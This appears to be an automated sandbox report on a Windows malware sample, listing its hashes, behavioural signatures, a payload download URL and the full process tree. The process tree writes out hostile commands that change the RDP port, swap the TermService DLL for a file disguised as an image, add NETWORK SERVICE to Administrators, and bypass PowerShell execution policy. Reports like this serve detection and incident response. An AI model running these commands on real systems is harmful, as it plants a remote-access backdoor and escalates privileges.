Analysis
- max time kernel: 148s
- max time network: 150s
- platform: windows10_x64
- resource: win10v20210408
- submitted: 11-06-2021 14:56
Static task: static1
Behavioral task: behavioral1
- Sample: 7a383f57f7d2190d9af3e57d67cfb004.exe
- Resource: win7v20210410
Behavioral task: behavioral2
- Sample: 7a383f57f7d2190d9af3e57d67cfb004.exe
- Resource: win10v20210408
General
- Target: 7a383f57f7d2190d9af3e57d67cfb004.exe
- Size: 6.9MB
- MD5: 7a383f57f7d2190d9af3e57d67cfb004
- SHA1: 2e783c279542ea1708854413a0cd725184f8fa78
- SHA256: f18e085889d9d7324c57ecb800563ba2e808c0ef8ad52b7b1f1f3afa169bf836
- SHA512: 0f2509170c215efd58a09b4a00d593f087773da93f1877aab9b9f24474b06ad62494fa730fc435829a0365d7bd3d7440818a99e1b4c866882a0ed1cdc3eec9cb
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
- Grants admin privileges (1 TTP)
  Uses net.exe to modify the user's privileges.
- Blocklisted process makes network request (9 IoCs)
  Processes:
  flow  pid   process
  18    3848  powershell.exe
  20    3848  powershell.exe
  21    3848  powershell.exe
  22    3848  powershell.exe
  24    3848  powershell.exe
  26    3848  powershell.exe
  28    3848  powershell.exe
  30    3848  powershell.exe
  32    3848  powershell.exe
- Executes dropped EXE (3 IoCs)
  Processes:
  pid   process
  4256  Vostra.exe.com
  3888  Vostra.exe.com
  816   Vostra.exe.com
- Modifies RDP port number used by Windows (1 TTP)
- Sets DLL path for service in the registry (2 TTPs)
-
  Processes:
  resource                        yara_rule
  \Windows\Branding\mediasrv.png  upx
  \Windows\Branding\mediasvc.png  upx
- Deletes itself (1 IoC)
  Processes:
  pid   process
  1276  powershell.exe
- Loads dropped DLL (2 IoCs)
  Processes:
  pid   process
  4104
  4104
- Suspicious use of SetThreadContext (1 IoC)
  Processes:
  description                         pid   process         target process
  PID 3888 set thread context of 816  3888  Vostra.exe.com  Vostra.exe.com
- Drops file in Program Files directory (4 IoCs)
  Processes:
  description                   ioc  process
  File opened for modification  C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT  powershell.exe
  File opened for modification  C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI  powershell.exe
  File opened for modification  C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT  powershell.exe
  File opened for modification  C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI  powershell.exe
- Drops file in Windows directory (19 IoCs)
  Processes:
  description                   ioc  process
  File created                  C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP  powershell.exe
  File opened for modification  C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI388.tmp  powershell.exe
  File opened for modification  C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI39A.tmp  powershell.exe
  File opened for modification  C:\Windows\branding\Basebrd  powershell.exe
  File opened for modification  C:\Windows\branding\wupsvc.jpg  powershell.exe
  File opened for modification  C:\Windows\branding\ShellBrd  powershell.exe
  File opened for modification  C:\Windows\branding\mediasrv.png  powershell.exe
  File opened for modification  C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI378.tmp  powershell.exe
  File created                  C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log  powershell.exe
  File created                  C:\Windows\branding\mediasvc.png  powershell.exe
  File created                  C:\Windows\branding\wupsvc.jpg  powershell.exe
  File created                  C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_2yul2pfd.t15.ps1  powershell.exe
  File created                  C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_4v51yvue.3u1.psm1  powershell.exe
  File opened for modification  C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI399.tmp  powershell.exe
  File created                  C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive  powershell.exe
  File created                  C:\Windows\branding\mediasrv.png  powershell.exe
  File opened for modification  C:\Windows\branding\mediasvc.png  powershell.exe
  File opened for modification  C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI309.tmp  powershell.exe
  File opened for modification  C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat  powershell.exe
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Modifies data under HKEY_USERS (64 IoCs)
  Processes:
  description       ioc  process
  Key created       \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs  powershell.exe
  Key created       \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CRLs  powershell.exe
  Set value (int)   \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Flags = "33"  powershell.exe
  Set value (str)   \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Description = "This zone contains all Web sites that are on your organization's intranet."  powershell.exe
  Key created       \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\Certificates  powershell.exe
  Key created       \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople  powershell.exe
  Set value (str)   \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Icon = "inetcpl.cpl#00004481"  powershell.exe
  Set value (str)   \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\DisplayName = "My Computer"  powershell.exe
  Key created       \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed  powershell.exe
  Key created       \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\Certificates  powershell.exe
  Key created       \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs  powershell.exe
  Key created       \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs  powershell.exe
  Set value (int)   \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Flags = "219"  powershell.exe
  Set value (str)   \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\  powershell.exe
  Set value (str)   \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\LowIcon = "inetcpl.cpl#005422"  powershell.exe
  Set value (str)   \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data."  powershell.exe
  Key created       \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root  powershell.exe
  Key created       \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup  powershell.exe
  Key created       \REGISTRY\USER\S-1-5-20\Software  powershell.exe
  Set value (int)   \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyByPass = "0"  powershell.exe
  Key created       \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CTLs  powershell.exe
  Set value (str)   \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map\57fd7ae31ab34c2c = ",33,HKCU,SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\Extensible Cache,"  powershell.exe
  Set value (str)   \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\LowIcon = "inetcpl.cpl#005422"  powershell.exe
  Set value (str)   \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\DisplayName = "Restricted sites"  powershell.exe
  Set value (str)   \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Icon = "inetcpl.cpl#00004481"  powershell.exe
  Set value (int)   \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\CurrentLevel = "0"  powershell.exe
  Set value (int)   \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\1200 = "3"  powershell.exe
  Set value (int)   \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"  powershell.exe
  Set value (data)  \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0\2ba02e083fadee33 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c004900450035005f00550041005f004200610063006b00750070005f0046006c00610067002c0000000100080035002e0030000000000000000000  powershell.exe
  Key created       \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4  powershell.exe
  Set value (int)   \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Flags = "33"  powershell.exe
  Set value (int)   \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\1400 = "3"  powershell.exe
  Set value (int)   \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\ftp = "3"  powershell.exe
  Set value (str)   \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\DisplayName = "My Computer"  powershell.exe
  Set value (int)   \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\CurrentLevel = "70912"  powershell.exe
  Key created       \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4  powershell.exe
  Set value (str)   \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\PMDisplayName = "Restricted sites [Protected Mode]"  powershell.exe
  Set value (int)   \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Flags = "33"  powershell.exe
  Key created       \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults  powershell.exe
  Key created       \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA  powershell.exe
  Set value (str)   \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "My Computer [Protected Mode]"  powershell.exe
  Set value (int)   \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\1400 = "1"  powershell.exe
  Key created       \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates  powershell.exe
  Key created       \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates  powershell.exe
  Set value (str)   \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\  powershell.exe
  Key created       \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows  powershell.exe
  Set value (int)   \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\CurrentLevel = "0"  powershell.exe
  Key created       \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates  powershell.exe
  Key created       \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs  powershell.exe
  Set value (str)   \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\PMDisplayName = "Local intranet [Protected Mode]"  powershell.exe
  Set value (int)   \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\1200 = "0"  powershell.exe
  Key created       \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap  powershell.exe
  Key created       \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1  powershell.exe
  Set value (str)   \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\  powershell.exe
  Key created       \REGISTRY\USER\S-1-5-20\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections  powershell.exe
  Set value (str)   \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\PMDisplayName = "Trusted sites [Protected Mode]"  powershell.exe
  Key created       \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing  powershell.exe
  Set value (str)   \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\DisplayName = "Local intranet"  powershell.exe
  Set value (str)   \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\DisplayName = "Computer"  powershell.exe
  Set value (data)  \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZonesSecurityUpgrade = 6ead5207ab2cd701  powershell.exe
  Key created       \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup  powershell.exe
  Set value (str)   \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\  powershell.exe
  Set value (str)   \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Icon = "shell32.dll#0016"  powershell.exe
  Key created       \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\  WMIC.exe
- Modifies registry key (1 TTP, 1 IoC)
- Runs net.exe
- Runs ping.exe (1 TTP, 1 IoC)
- Script User-Agent (4 IoCs)
  Uses user-agent string associated with script host/environment.
  Processes:
  description             flow  ioc
  HTTP User-Agent header  20    Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
  HTTP User-Agent header  21    Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
  HTTP User-Agent header  22    Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
  HTTP User-Agent header  24    Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
- Suspicious behavior: EnumeratesProcesses (18 IoCs)
  Processes:
  pid   process
  1276  powershell.exe
  1276  powershell.exe
  1276  powershell.exe
  4024  powershell.exe
  4024  powershell.exe
  4024  powershell.exe
  4604  powershell.exe
  4604  powershell.exe
  4604  powershell.exe
  2300  powershell.exe
  2300  powershell.exe
  2300  powershell.exe
  1276  powershell.exe
  1276  powershell.exe
  1276  powershell.exe
  3848  powershell.exe
  3848  powershell.exe
  3848  powershell.exe
- Suspicious behavior: LoadsDriver (2 IoCs)
  Processes:
  pid   process
  616
  616
- Suspicious use of AdjustPrivilegeToken (64 IoCs)
  Processes:
  description                           pid   process
  Token: SeDebugPrivilege               1276  powershell.exe
  Token: SeDebugPrivilege               4024  powershell.exe
  Token: SeIncreaseQuotaPrivilege       4024  powershell.exe
  Token: SeSecurityPrivilege            4024  powershell.exe
  Token: SeTakeOwnershipPrivilege       4024  powershell.exe
  Token: SeLoadDriverPrivilege          4024  powershell.exe
  Token: SeSystemProfilePrivilege       4024  powershell.exe
  Token: SeSystemtimePrivilege          4024  powershell.exe
  Token: SeProfSingleProcessPrivilege   4024  powershell.exe
  Token: SeIncBasePriorityPrivilege     4024  powershell.exe
  Token: SeCreatePagefilePrivilege      4024  powershell.exe
  Token: SeBackupPrivilege              4024  powershell.exe
  Token: SeRestorePrivilege             4024  powershell.exe
  Token: SeShutdownPrivilege            4024  powershell.exe
  Token: SeDebugPrivilege               4024  powershell.exe
  Token: SeSystemEnvironmentPrivilege   4024  powershell.exe
  Token: SeRemoteShutdownPrivilege      4024  powershell.exe
  Token: SeUndockPrivilege              4024  powershell.exe
  Token: SeManageVolumePrivilege        4024  powershell.exe
  Token: 33                             4024  powershell.exe
  Token: 34                             4024  powershell.exe
  Token: 35                             4024  powershell.exe
  Token: 36                             4024  powershell.exe
  Token: SeDebugPrivilege               4604  powershell.exe
  Token: SeIncreaseQuotaPrivilege       4604  powershell.exe
  Token: SeSecurityPrivilege            4604  powershell.exe
  Token: SeTakeOwnershipPrivilege       4604  powershell.exe
  Token: SeLoadDriverPrivilege          4604  powershell.exe
  Token: SeSystemProfilePrivilege       4604  powershell.exe
  Token: SeSystemtimePrivilege          4604  powershell.exe
  Token: SeProfSingleProcessPrivilege   4604  powershell.exe
  Token: SeIncBasePriorityPrivilege     4604  powershell.exe
  Token: SeCreatePagefilePrivilege      4604  powershell.exe
  Token: SeBackupPrivilege              4604  powershell.exe
  Token: SeRestorePrivilege             4604  powershell.exe
  Token: SeShutdownPrivilege            4604  powershell.exe
  Token: SeDebugPrivilege               4604  powershell.exe
  Token: SeSystemEnvironmentPrivilege   4604  powershell.exe
  Token: SeRemoteShutdownPrivilege      4604  powershell.exe
  Token: SeUndockPrivilege              4604  powershell.exe
  Token: SeManageVolumePrivilege        4604  powershell.exe
  Token: 33                             4604  powershell.exe
  Token: 34                             4604  powershell.exe
  Token: 35                             4604  powershell.exe
  Token: 36                             4604  powershell.exe
  Token: SeDebugPrivilege               2300  powershell.exe
  Token: SeIncreaseQuotaPrivilege       2300  powershell.exe
  Token: SeSecurityPrivilege            2300  powershell.exe
  Token: SeTakeOwnershipPrivilege       2300  powershell.exe
  Token: SeLoadDriverPrivilege          2300  powershell.exe
  Token: SeSystemProfilePrivilege       2300  powershell.exe
  Token: SeSystemtimePrivilege          2300  powershell.exe
  Token: SeProfSingleProcessPrivilege   2300  powershell.exe
  Token: SeIncBasePriorityPrivilege     2300  powershell.exe
  Token: SeCreatePagefilePrivilege      2300  powershell.exe
  Token: SeBackupPrivilege              2300  powershell.exe
  Token: SeRestorePrivilege             2300  powershell.exe
  Token: SeShutdownPrivilege            2300  powershell.exe
  Token: SeDebugPrivilege               2300  powershell.exe
  Token: SeSystemEnvironmentPrivilege   2300  powershell.exe
  Token: SeRemoteShutdownPrivilege      2300  powershell.exe
  Token: SeUndockPrivilege              2300  powershell.exe
  Token: SeManageVolumePrivilege        2300  powershell.exe
  Token: 33                             2300  powershell.exe
- Suspicious use of WriteProcessMemory (64 IoCs)
  Processes:
  description                        pid   process                               target process
  PID 4656 wrote to memory of 3676   4656  7a383f57f7d2190d9af3e57d67cfb004.exe  cmd.exe
  PID 4656 wrote to memory of 3676   4656  7a383f57f7d2190d9af3e57d67cfb004.exe  cmd.exe
  PID 4656 wrote to memory of 3676   4656  7a383f57f7d2190d9af3e57d67cfb004.exe  cmd.exe
  PID 3676 wrote to memory of 3036   3676  cmd.exe                               cmd.exe
  PID 3676 wrote to memory of 3036   3676  cmd.exe                               cmd.exe
  PID 3676 wrote to memory of 3036   3676  cmd.exe                               cmd.exe
  PID 3036 wrote to memory of 60     3036  cmd.exe                               findstr.exe
  PID 3036 wrote to memory of 60     3036  cmd.exe                               findstr.exe
  PID 3036 wrote to memory of 60     3036  cmd.exe                               findstr.exe
  PID 3036 wrote to memory of 4256   3036  cmd.exe                               Vostra.exe.com
  PID 3036 wrote to memory of 4256   3036  cmd.exe                               Vostra.exe.com
  PID 3036 wrote to memory of 4276   3036  cmd.exe                               PING.EXE
  PID 3036 wrote to memory of 4276   3036  cmd.exe                               PING.EXE
  PID 3036 wrote to memory of 4276   3036  cmd.exe                               PING.EXE
  PID 4256 wrote to memory of 3888   4256  Vostra.exe.com                        Vostra.exe.com
  PID 4256 wrote to memory of 3888   4256  Vostra.exe.com                        Vostra.exe.com
  PID 3888 wrote to memory of 816    3888  Vostra.exe.com                        Vostra.exe.com
  PID 3888 wrote to memory of 816    3888  Vostra.exe.com                        Vostra.exe.com
  PID 3888 wrote to memory of 816    3888  Vostra.exe.com                        Vostra.exe.com
  PID 3888 wrote to memory of 816    3888  Vostra.exe.com                        Vostra.exe.com
  PID 816 wrote to memory of 1276    816   Vostra.exe.com                        powershell.exe
  PID 816 wrote to memory of 1276    816   Vostra.exe.com                        powershell.exe
  PID 1276 wrote to memory of 2616   1276  powershell.exe                        csc.exe
  PID 1276 wrote to memory of 2616   1276  powershell.exe                        csc.exe
  PID 2616 wrote to memory of 2680   2616  csc.exe                               cvtres.exe
  PID 2616 wrote to memory of 2680   2616  csc.exe                               cvtres.exe
  PID 1276 wrote to memory of 4024   1276  powershell.exe                        powershell.exe
  PID 1276 wrote to memory of 4024   1276  powershell.exe                        powershell.exe
  PID 1276 wrote to memory of 4604   1276  powershell.exe                        powershell.exe
  PID 1276 wrote to memory of 4604   1276  powershell.exe                        powershell.exe
  PID 1276 wrote to memory of 2300   1276  powershell.exe                        powershell.exe
  PID 1276 wrote to memory of 2300   1276  powershell.exe                        powershell.exe
  PID 1276 wrote to memory of 3952   1276  powershell.exe                        reg.exe
  PID 1276 wrote to memory of 3952   1276  powershell.exe                        reg.exe
  PID 1276 wrote to memory of 4892   1276  powershell.exe                        reg.exe
  PID 1276 wrote to memory of 4892   1276  powershell.exe                        reg.exe
  PID 1276 wrote to memory of 4980   1276  powershell.exe                        reg.exe
  PID 1276 wrote to memory of 4980   1276  powershell.exe                        reg.exe
  PID 1276 wrote to memory of 1340   1276  powershell.exe                        net.exe
  PID 1276 wrote to memory of 1340   1276  powershell.exe                        net.exe
  PID 1340 wrote to memory of 3440   1340  net.exe                               net1.exe
  PID 1340 wrote to memory of 3440   1340  net.exe                               net1.exe
  PID 1276 wrote to memory of 3564   1276  powershell.exe                        cmd.exe
  PID 1276 wrote to memory of 3564   1276  powershell.exe                        cmd.exe
  PID 3564 wrote to memory of 3596   3564  cmd.exe                               cmd.exe
  PID 3564 wrote to memory of 3596   3564  cmd.exe                               cmd.exe
  PID 3596 wrote to memory of 776    3596  cmd.exe                               net.exe
  PID 3596 wrote to memory of 776    3596  cmd.exe                               net.exe
  PID 776 wrote to memory of 4220    776   net.exe                               net1.exe
  PID 776 wrote to memory of 4220    776   net.exe                               net1.exe
  PID 1276 wrote to memory of 3032   1276  powershell.exe                        cmd.exe
  PID 1276 wrote to memory of 3032   1276  powershell.exe                        cmd.exe
  PID 3032 wrote to memory of 3236   3032  cmd.exe                               cmd.exe
  PID 3032 wrote to memory of 3236   3032  cmd.exe                               cmd.exe
  PID 3236 wrote to memory of 4256   3236  cmd.exe                               net.exe
  PID 3236 wrote to memory of 4256   3236  cmd.exe                               net.exe
  PID 4256 wrote to memory of 5012   4256  net.exe                               net1.exe
  PID 4256 wrote to memory of 5012   4256  net.exe                               net1.exe
  PID 2668 wrote to memory of 4724   2668  cmd.exe                               net.exe
  PID 2668 wrote to memory of 4724   2668  cmd.exe                               net.exe
  PID 4724 wrote to memory of 4672   4724  net.exe                               net1.exe
  PID 4724 wrote to memory of 4672   4724  net.exe                               net1.exe
  PID 648 wrote to memory of 4168    648   cmd.exe                               net.exe
  PID 648 wrote to memory of 4168    648   cmd.exe                               net.exe
Processes (tree depth in brackets; indentation follows parent/child nesting)
[1] C:\Users\Admin\AppData\Local\Temp\7a383f57f7d2190d9af3e57d67cfb004.exe
    command line: "C:\Users\Admin\AppData\Local\Temp\7a383f57f7d2190d9af3e57d67cfb004.exe"
    - Suspicious use of WriteProcessMemory
  [2] C:\Windows\SysWOW64\cmd.exe
      command line: "C:\Windows\system32\cmd.exe" /c C:\Windows\system32\cmd < Poi.vsd
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\SysWOW64\cmd.exe
        command line: C:\Windows\system32\cmd
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\SysWOW64\findstr.exe
          command line: findstr /V /R "^nZwSZJdQSZwKBWJCtpbfZHNwzsXALugVPsbikcLGmlTQMSJGkUUtRoHQkZmHLQyLLuVpnCdInRQPNWfBIsgQkprGKGWkWrUJtiyFXmiJDkGqaSrgKXZxBgABegmS$" Che.vsd
      [4] C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Vostra.exe.com
          command line: Vostra.exe.com D
          - Executes dropped EXE
          - Suspicious use of WriteProcessMemory
        [5] C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Vostra.exe.com
            command line: C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Vostra.exe.com D
            - Executes dropped EXE
            - Suspicious use of SetThreadContext
            - Suspicious use of WriteProcessMemory
          [6] C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Vostra.exe.com
              command line: C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Vostra.exe.com
              - Executes dropped EXE
              - Suspicious use of WriteProcessMemory
            [7] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                command line: "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
                - Deletes itself
                - Drops file in Windows directory
                - Suspicious behavior: EnumeratesProcesses
                - Suspicious use of AdjustPrivilegeToken
                - Suspicious use of WriteProcessMemory
              [8] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                  command line: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\jd5y2gwd\jd5y2gwd.cmdline"
                  - Suspicious use of WriteProcessMemory
                [9] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                    command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESAD38.tmp" "c:\Users\Admin\AppData\Local\Temp\jd5y2gwd\CSC3358E928C6584838BD4D118D3AA38383.TMP"
              [8] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                  - Suspicious behavior: EnumeratesProcesses
                  - Suspicious use of AdjustPrivilegeToken
              [8] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                  - Suspicious behavior: EnumeratesProcesses
                  - Suspicious use of AdjustPrivilegeToken
              [8] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                  - Suspicious behavior: EnumeratesProcesses
                  - Suspicious use of AdjustPrivilegeToken
              [8] C:\Windows\system32\reg.exe
                  command line: "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
              [8] C:\Windows\system32\reg.exe
                  command line: "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
                  - Modifies registry key
              [8] C:\Windows\system32\reg.exe
                  command line: "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
              [8] C:\Windows\system32\net.exe
                  command line: "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
                  - Suspicious use of WriteProcessMemory
                [9] C:\Windows\system32\net1.exe
                    command line: C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
              [8] C:\Windows\system32\cmd.exe
                  command line: "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
                  - Suspicious use of WriteProcessMemory
                [9] C:\Windows\system32\cmd.exe
                    command line: cmd /c net start rdpdr
                    - Suspicious use of WriteProcessMemory
                  [10] C:\Windows\system32\net.exe
                       command line: net start rdpdr
                       - Suspicious use of WriteProcessMemory
                    [11] C:\Windows\system32\net1.exe
                         command line: C:\Windows\system32\net1 start rdpdr
              [8] C:\Windows\system32\cmd.exe
                  command line: "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
                  - Suspicious use of WriteProcessMemory
                [9] C:\Windows\system32\cmd.exe
                    command line: cmd /c net start TermService
                    - Suspicious use of WriteProcessMemory
                  [10] C:\Windows\system32\net.exe
                       command line: net start TermService
                       - Suspicious use of WriteProcessMemory
                    [11] C:\Windows\system32\net1.exe
                         command line: C:\Windows\system32\net1 start TermService
              [8] C:\Windows\system32\cmd.exe
                  command line: "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
              [8] C:\Windows\system32\cmd.exe
                  command line: "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
      [4] C:\Windows\SysWOW64\PING.EXE
          command line: ping 127.0.0.1 -n 30
          - Runs ping.exe
